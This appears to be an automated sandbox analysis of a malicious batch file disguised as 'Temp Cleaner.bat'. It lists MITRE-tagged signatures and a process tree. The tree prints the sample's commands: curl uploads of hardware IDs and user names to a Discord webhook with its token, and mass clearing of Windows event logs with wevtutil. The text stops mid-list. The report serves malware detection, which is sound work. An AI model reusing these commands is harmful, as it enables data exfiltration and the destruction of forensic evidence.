d6b864d472efa77cbc6179e14e2172945ea1825860a5718dac6f0b835c9b2f01

Analysis

max time kernel
96s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2024 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Temp Cleaner.bat
Size

2KB
MD5

ec35c8fdb352d85df9d1c074b36e2196
SHA1

ba3eac35af48eb8492fa98ec19ab69e45aa7e211
SHA256

d6b864d472efa77cbc6179e14e2172945ea1825860a5718dac6f0b835c9b2f01
SHA512

c7a84a581146a68e8061ffd6efcd6b8e84019bb7c2f1da5e105eab887636b5b6763ef2cf9e756a0df3171e6883784d59bffc1b45ea95e4873d9e4f6126252bd1

Score

9^/10

discovery evasion persistence ransomware

Malware Config

Signatures

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
4800	wevtutil.exe
4752	wevtutil.exe
4920	Process not Found
4448	wevtutil.exe
908	wevtutil.exe
2964	wevtutil.exe
1888	wevtutil.exe
2856	wevtutil.exe
4828	wevtutil.exe
3096	wevtutil.exe
4584	wevtutil.exe
1608	wevtutil.exe
4300	wevtutil.exe
3208	wevtutil.exe
5100	wevtutil.exe
3292	wevtutil.exe
4124	Process not Found
5060	wevtutil.exe
4100	wevtutil.exe
2600	wevtutil.exe
2272	Process not Found
964	wevtutil.exe
2644	wevtutil.exe
1288	wevtutil.exe
5040	wevtutil.exe
412	wevtutil.exe
2308	wevtutil.exe
3028	wevtutil.exe
1884	wevtutil.exe
1212	wevtutil.exe
1884	wevtutil.exe
4920	wevtutil.exe
1524	wevtutil.exe
3064	Process not Found
696	Process not Found
2028	wevtutil.exe
3336	wevtutil.exe
4540	wevtutil.exe
1436	wevtutil.exe
2668	wevtutil.exe
2028	wevtutil.exe
1452	wevtutil.exe
3040	wevtutil.exe
4060	wevtutil.exe
4308	wevtutil.exe
4004	wevtutil.exe
4540	wevtutil.exe
548	wevtutil.exe
2460	wevtutil.exe
740	wevtutil.exe
8	wevtutil.exe
864	Process not Found
456	Process not Found
3536	wevtutil.exe
3740	wevtutil.exe
2008	wevtutil.exe
1084	Process not Found
2896	wevtutil.exe
1912	wevtutil.exe
3708	wevtutil.exe
4620	wevtutil.exe
1944	wevtutil.exe
4992	wevtutil.exe
4444	wevtutil.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
9	discord.com
13	discord.com
14	discord.com
1	discord.com
2	discord.com

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
540	wevtutil.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
1640	wevtutil.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2344	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3704	WMIC.exe
Token: SeSecurityPrivilege	3704	WMIC.exe
Token: SeTakeOwnershipPrivilege	3704	WMIC.exe
Token: SeLoadDriverPrivilege	3704	WMIC.exe
Token: SeSystemProfilePrivilege	3704	WMIC.exe
Token: SeSystemtimePrivilege	3704	WMIC.exe
Token: SeProfSingleProcessPrivilege	3704	WMIC.exe
Token: SeIncBasePriorityPrivilege	3704	WMIC.exe
Token: SeCreatePagefilePrivilege	3704	WMIC.exe
Token: SeBackupPrivilege	3704	WMIC.exe
Token: SeRestorePrivilege	3704	WMIC.exe
Token: SeShutdownPrivilege	3704	WMIC.exe
Token: SeDebugPrivilege	3704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3704	WMIC.exe
Token: SeRemoteShutdownPrivilege	3704	WMIC.exe
Token: SeUndockPrivilege	3704	WMIC.exe
Token: SeManageVolumePrivilege	3704	WMIC.exe
Token: 33	3704	WMIC.exe
Token: 34	3704	WMIC.exe
Token: 35	3704	WMIC.exe
Token: 36	3704	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3704	WMIC.exe
Token: SeSecurityPrivilege	3704	WMIC.exe
Token: SeTakeOwnershipPrivilege	3704	WMIC.exe
Token: SeLoadDriverPrivilege	3704	WMIC.exe
Token: SeSystemProfilePrivilege	3704	WMIC.exe
Token: SeSystemtimePrivilege	3704	WMIC.exe
Token: SeProfSingleProcessPrivilege	3704	WMIC.exe
Token: SeIncBasePriorityPrivilege	3704	WMIC.exe
Token: SeCreatePagefilePrivilege	3704	WMIC.exe
Token: SeBackupPrivilege	3704	WMIC.exe
Token: SeRestorePrivilege	3704	WMIC.exe
Token: SeShutdownPrivilege	3704	WMIC.exe
Token: SeDebugPrivilege	3704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3704	WMIC.exe
Token: SeRemoteShutdownPrivilege	3704	WMIC.exe
Token: SeUndockPrivilege	3704	WMIC.exe
Token: SeManageVolumePrivilege	3704	WMIC.exe
Token: 33	3704	WMIC.exe
Token: 34	3704	WMIC.exe
Token: 35	3704	WMIC.exe
Token: 36	3704	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe
Token: SeSecurityPrivilege	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	2292	WMIC.exe
Token: SeLoadDriverPrivilege	2292	WMIC.exe
Token: SeSystemProfilePrivilege	2292	WMIC.exe
Token: SeSystemtimePrivilege	2292	WMIC.exe
Token: SeProfSingleProcessPrivilege	2292	WMIC.exe
Token: SeIncBasePriorityPrivilege	2292	WMIC.exe
Token: SeCreatePagefilePrivilege	2292	WMIC.exe
Token: SeBackupPrivilege	2292	WMIC.exe
Token: SeRestorePrivilege	2292	WMIC.exe
Token: SeShutdownPrivilege	2292	WMIC.exe
Token: SeDebugPrivilege	2292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2292	WMIC.exe
Token: SeRemoteShutdownPrivilege	2292	WMIC.exe
Token: SeUndockPrivilege	2292	WMIC.exe
Token: SeManageVolumePrivilege	2292	WMIC.exe
Token: 33	2292	WMIC.exe
Token: 34	2292	WMIC.exe
Token: 35	2292	WMIC.exe
Token: 36	2292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4772 wrote to memory of 2580	4772	cmd.exe	83
PID 4772 wrote to memory of 2580	4772	cmd.exe	83
PID 4772 wrote to memory of 324	4772	cmd.exe	84
PID 4772 wrote to memory of 324	4772	cmd.exe	84
PID 4772 wrote to memory of 4992	4772	cmd.exe	85
PID 4772 wrote to memory of 4992	4772	cmd.exe	85
PID 4772 wrote to memory of 3704	4772	cmd.exe	86
PID 4772 wrote to memory of 3704	4772	cmd.exe	86
PID 4772 wrote to memory of 2292	4772	cmd.exe	89
PID 4772 wrote to memory of 2292	4772	cmd.exe	89
PID 4772 wrote to memory of 2192	4772	cmd.exe	91
PID 4772 wrote to memory of 2192	4772	cmd.exe	91
PID 4772 wrote to memory of 4576	4772	cmd.exe	92
PID 4772 wrote to memory of 4576	4772	cmd.exe	92
PID 4772 wrote to memory of 4508	4772	cmd.exe	93
PID 4772 wrote to memory of 4508	4772	cmd.exe	93
PID 4772 wrote to memory of 1020	4772	cmd.exe	94
PID 4772 wrote to memory of 1020	4772	cmd.exe	94
PID 4772 wrote to memory of 3176	4772	cmd.exe	95
PID 4772 wrote to memory of 3176	4772	cmd.exe	95
PID 4772 wrote to memory of 3208	4772	cmd.exe	96
PID 4772 wrote to memory of 3208	4772	cmd.exe	96
PID 3208 wrote to memory of 5048	3208	cmd.exe	97
PID 3208 wrote to memory of 5048	3208	cmd.exe	97
PID 4772 wrote to memory of 4920	4772	cmd.exe	98
PID 4772 wrote to memory of 4920	4772	cmd.exe	98
PID 4920 wrote to memory of 2312	4920	cmd.exe	99
PID 4920 wrote to memory of 2312	4920	cmd.exe	99
PID 4772 wrote to memory of 4212	4772	cmd.exe	100
PID 4772 wrote to memory of 4212	4772	cmd.exe	100
PID 4772 wrote to memory of 2368	4772	cmd.exe	101
PID 4772 wrote to memory of 2368	4772	cmd.exe	101
PID 4772 wrote to memory of 456	4772	cmd.exe	102
PID 4772 wrote to memory of 456	4772	cmd.exe	102
PID 4772 wrote to memory of 5064	4772	cmd.exe	103
PID 4772 wrote to memory of 5064	4772	cmd.exe	103
PID 4772 wrote to memory of 4940	4772	cmd.exe	104
PID 4772 wrote to memory of 4940	4772	cmd.exe	104
PID 4772 wrote to memory of 3144	4772	cmd.exe	105
PID 4772 wrote to memory of 3144	4772	cmd.exe	105
PID 4772 wrote to memory of 4792	4772	cmd.exe	106
PID 4772 wrote to memory of 4792	4772	cmd.exe	106
PID 4772 wrote to memory of 636	4772	cmd.exe	107
PID 4772 wrote to memory of 636	4772	cmd.exe	107
PID 4772 wrote to memory of 3048	4772	cmd.exe	108
PID 4772 wrote to memory of 3048	4772	cmd.exe	108
PID 4772 wrote to memory of 1568	4772	cmd.exe	109
PID 4772 wrote to memory of 1568	4772	cmd.exe	109
PID 4772 wrote to memory of 1924	4772	cmd.exe	110
PID 4772 wrote to memory of 1924	4772	cmd.exe	110
PID 4772 wrote to memory of 4580	4772	cmd.exe	111
PID 4772 wrote to memory of 4580	4772	cmd.exe	111
PID 4772 wrote to memory of 3944	4772	cmd.exe	112
PID 4772 wrote to memory of 3944	4772	cmd.exe	112
PID 4772 wrote to memory of 3096	4772	cmd.exe	113
PID 4772 wrote to memory of 3096	4772	cmd.exe	113
PID 4772 wrote to memory of 3940	4772	cmd.exe	114
PID 4772 wrote to memory of 3940	4772	cmd.exe	114
PID 4772 wrote to memory of 696	4772	cmd.exe	115
PID 4772 wrote to memory of 696	4772	cmd.exe	115
PID 4772 wrote to memory of 2240	4772	cmd.exe	116
PID 4772 wrote to memory of 2240	4772	cmd.exe	116
PID 4772 wrote to memory of 3156	4772	cmd.exe	117
PID 4772 wrote to memory of 3156	4772	cmd.exe	117

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp Cleaner.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4772
- C:\Windows\system32\mode.com
  mode con cols=80 lines=25
  2⤵
  PID:2580
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:324
- C:\Windows\system32\HOSTNAME.EXE
  hostname
  2⤵
  PID:4992
- C:\Windows\System32\Wbem\WMIC.exe
  wmic csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3704
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get processorid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2292
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"hwid.txt" https://discord.com/api/webhooks/1268887593777631273/KC8BvkTFp-Iiz-tnjWZeb5SIOw2bc1VsD19N4eb3z-Oj5GPOlFbc0fQJ9uSLbZ4HQ37K
  2⤵
  PID:2192
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"cpuid.txt" https://discord.com/api/webhooks/1268887593777631273/KC8BvkTFp-Iiz-tnjWZeb5SIOw2bc1VsD19N4eb3z-Oj5GPOlFbc0fQJ9uSLbZ4HQ37K
  2⤵
  PID:4576
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"pcusername.txt" https://discord.com/api/webhooks/1268887593777631273/KC8BvkTFp-Iiz-tnjWZeb5SIOw2bc1VsD19N4eb3z-Oj5GPOlFbc0fQJ9uSLbZ4HQ37K
  2⤵
  PID:4508
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"pcname.txt" https://discord.com/api/webhooks/1268887593777631273/KC8BvkTFp-Iiz-tnjWZeb5SIOw2bc1VsD19N4eb3z-Oj5GPOlFbc0fQJ9uSLbZ4HQ37K
  2⤵
  PID:1020
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c bcdedit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3208
- - C:\Windows\system32\bcdedit.exe
    bcdedit
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wevtutil.exe el
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe el
    3⤵
    PID:2312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "AMSI/Debug"
  2⤵
  PID:4212
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "AirSpaceChannel"
  2⤵
  PID:2368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Analytic"
  2⤵
  PID:456
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Application"
  2⤵
  PID:5064
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "DirectShowFilterGraph"
  2⤵
  PID:4940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "DirectShowPluginControl"
  2⤵
  PID:3144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Els_Hyphenation/Analytic"
  2⤵
  PID:4792
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "EndpointMapper"
  2⤵
  PID:636
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "FirstUXPerf-Analytic"
  2⤵
  PID:3048
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "ForwardedEvents"
  2⤵
  PID:1568
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "General Logging"
  2⤵
  PID:1924
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "HardwareEvents"
  2⤵
  PID:4580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "IHM_DebugChannel"
  2⤵
  PID:3944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
  2⤵
  PID:3096
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
  2⤵
  PID:3940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
  2⤵
  PID:696
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
  2⤵
  PID:2240
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
  2⤵
  PID:3156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
  2⤵
  PID:440
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Internet Explorer"
  2⤵
  PID:4988
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Key Management Service"
  2⤵
  PID:1048
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
  2⤵
  PID:2760
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
  2⤵
  PID:540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MF_MediaFoundationFrameServer"
  2⤵
  PID:1520
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MedaFoundationVideoProc"
  2⤵
  PID:5052
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MedaFoundationVideoProcD3D"
  2⤵
  PID:464
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationAsyncWrapper"
  2⤵
  PID:4364
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationContentProtection"
  2⤵
  PID:2156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationDS"
  2⤵
  PID:2940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationDeviceProxy"
  2⤵
  PID:3936
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationMP4"
  2⤵
  PID:2816
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationMediaEngine"
  2⤵
  PID:4496
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPerformance"
  2⤵
  PID:408
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPerformanceCore"
  2⤵
  PID:1484
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPipeline"
  2⤵
  PID:2764
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationPlatform"
  2⤵
  PID:2796
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "MediaFoundationSrcPrefetch"
  2⤵
  PID:3040
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
  2⤵
  PID:3336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Admin"
  2⤵
  PID:2800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Debug"
  2⤵
  PID:1008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Operational"
  2⤵
  PID:4512
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
  2⤵
  PID:1084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
  2⤵
  PID:2280
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
  2⤵
  PID:8
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
  2⤵
  - Clears Windows event logs
  PID:964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
  2⤵
  PID:2768
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-IE/Diagnostic"
  2⤵
  PID:2460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
  2⤵
  PID:3124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
  2⤵
  PID:428
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
  2⤵
  PID:2688
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
  2⤵
  PID:1036
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
  2⤵
  PID:548
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
  2⤵
  PID:3700
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
  2⤵
  PID:4060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
  2⤵
  PID:4100
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
  2⤵
  PID:3192
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
  2⤵
  PID:3392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
  2⤵
  PID:3732
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
  2⤵
  PID:4088
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
  2⤵
  PID:1832
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
  2⤵
  PID:4964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
  2⤵
  PID:4628
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
  2⤵
  PID:1764
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
  2⤵
  - Clears Windows event logs
  PID:2028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
  2⤵
  PID:3672
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
  2⤵
  PID:4448
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
  2⤵
  PID:3996
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
  2⤵
  PID:728
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
  2⤵
  PID:1376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
  2⤵
  PID:4932
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
  2⤵
  PID:1156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
  2⤵
  PID:4316
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
  2⤵
  - Clears Windows event logs
  PID:5060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
  2⤵
  PID:4640
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:1884
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
  2⤵
  PID:2284
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
  2⤵
  PID:1444
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
  2⤵
  PID:4436
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
  2⤵
  PID:3704
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
  2⤵
  PID:2252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
  2⤵
  PID:3812
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
  2⤵
  PID:4156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
  2⤵
  PID:4292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
  2⤵
  PID:4896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
  2⤵
  PID:2292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
  2⤵
  PID:220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
  2⤵
  PID:1328
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
  2⤵
  PID:2336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
  2⤵
  PID:4116
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
  2⤵
  PID:4064
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppSruProv"
  2⤵
  PID:2856
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
  2⤵
  PID:1392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
  2⤵
  PID:1196
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
  2⤵
  PID:4968
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
  2⤵
  PID:2652
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
  2⤵
  PID:2308
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
  2⤵
  PID:3736
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
  2⤵
  PID:2120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
  2⤵
  PID:3832
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
  2⤵
  PID:2964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
  2⤵
  PID:3208
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
  2⤵
  PID:2648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
  2⤵
  - Clears Windows event logs
  PID:4920
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
  2⤵
  PID:4160
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
  2⤵
  PID:3172
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
  2⤵
  PID:1552
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
  2⤵
  PID:3388
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
  2⤵
  PID:5100
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
  2⤵
  PID:4252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
  2⤵
  PID:4880
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
  2⤵
  PID:3220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
  2⤵
  PID:3536
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
  2⤵
  PID:3084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
  2⤵
  PID:3276
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
  2⤵
  PID:4816
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
  2⤵
  PID:1788
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
  2⤵
  - Clears Windows event logs
  PID:1524
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
  2⤵
  PID:1828
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
  2⤵
  PID:1216
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
  2⤵
  PID:1480
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
  2⤵
  PID:4828
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
  2⤵
  PID:5032
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
  2⤵
  PID:3264
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
  2⤵
  PID:868
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
  2⤵
  PID:1144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
  2⤵
  PID:3860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
  2⤵
  PID:3500
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
  2⤵
  PID:5052
- C:\Windows\system32\wevtutil.exe
